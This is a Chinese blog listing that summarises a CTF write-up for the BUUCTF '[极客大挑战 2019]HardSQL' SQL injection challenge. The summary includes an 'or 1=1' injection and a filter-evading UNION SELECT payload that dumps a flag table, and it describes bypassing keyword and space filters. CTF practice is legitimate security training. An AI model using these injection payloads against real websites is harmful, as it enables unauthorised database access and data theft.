2021年7月26日
BUUCTF [极客大挑战 2019]HardSQL extractvalue函数的利用
摘要: 打开靶机,注入题,先构造简单注入语句 1‘ or 1=1# 通过尝试多几次,用括号包含()代替空格,and被过滤了,那就用异或符^链接 admin'/**/ununionion/**/seselectlect/**/1,group_concat(flag),3/**/from/**/flag%25 阅读全文
posted @ 2021-07-26 23:13 Dixk-BXy 阅读(98) 评论(0) 推荐(0) 编辑
Live2D